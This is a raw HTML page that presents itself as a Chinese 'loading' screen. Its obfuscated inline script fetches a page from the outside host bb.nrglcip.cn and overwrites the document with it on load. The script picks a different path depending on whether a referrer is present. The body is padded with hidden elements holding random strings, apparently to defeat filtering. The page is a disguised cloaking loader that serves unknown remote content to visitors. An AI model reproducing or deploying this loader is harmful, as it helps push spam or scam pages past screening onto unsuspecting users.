<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .JR42q5t1HV {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .JR42q5t1HV .UwQQ56 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .JR42q5t1HV .content {
            line-height: 50px;
            text-align: center
        }

        .JR42q5t1HV .img {
            width: 100%
        }

        .JR42q5t1HV .eL5kBy {
            text-align: center
        }

        .JR42q5t1HV .eL5kBy span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .JR42q5t1HV .eL5kBy span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .JR42q5t1HV .eL5kBy span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .JR42q5t1HV .eL5kBy span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .JR42q5t1HV .eL5kBy span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .JR42q5t1HV .eL5kBy span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .JR42q5t1HV .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function CPLq6kLQhxPdr(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var gzBwX = CPLq6kLQhxPdr('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ gzBwX +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ gzBwX +".html?a=share";
		}
		
        jdjeDj5=url+"#"+new Date().getTime();
        jdjeDj5 && function() {
            $.get(jdjeDj5, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<img  src='' style='display:none'>
<h1 style='display:none' >ujcRiiIgeHRRe4AyA1aJkdeBSK9vFk0ZL6TvHx9qXHtiEovF75GqwpLiWlDRY</h1>
<a  href='#' style='display:none'>QE7V3CDwb6PyMBhZ</a>
<li style='display:none' >LBQLzoKu37d72xoMeetpStjdLtaymo1bmrAV8z5IqmHfSswvE547INqG9DHwaNKw1Vo</li>
<a  href='#' style='display:none'>QE7V3CDwb6PyMBhZ</a>
<a  href='#' style='display:none'>QE7V3CDwb6PyMBhZ</a>
<img  src='' style='display:none'><div class="JR42q5t1HV">
    <div class="UwQQ56">
        <div class="eL5kBy">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>EgkWygDwtbjYrzVdZY0s9r6QyhsQSFUU</a>
<h1 style='display:none' >psanGdJ74dBx8TZ9c6fb84Qpo8tgus</h1>
<img  src='' style='display:none'>
<li style='display:none' >WO5NclpdRIYbOPmZ0EPHQIOr</li>
<img  src='' style='display:none'>
<h1 style='display:none' >psanGdJ74dBx8TZ9c6fb84Qpo8tgus</h1>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>EgkWygDwtbjYrzVdZY0s9r6QyhsQSFUU</a>
<a  href='#' style='display:none'>EgkWygDwtbjYrzVdZY0s9r6QyhsQSFUU</a>
<ul style='display:none' >KgOfP23QooosUiW</ul></body>
</html>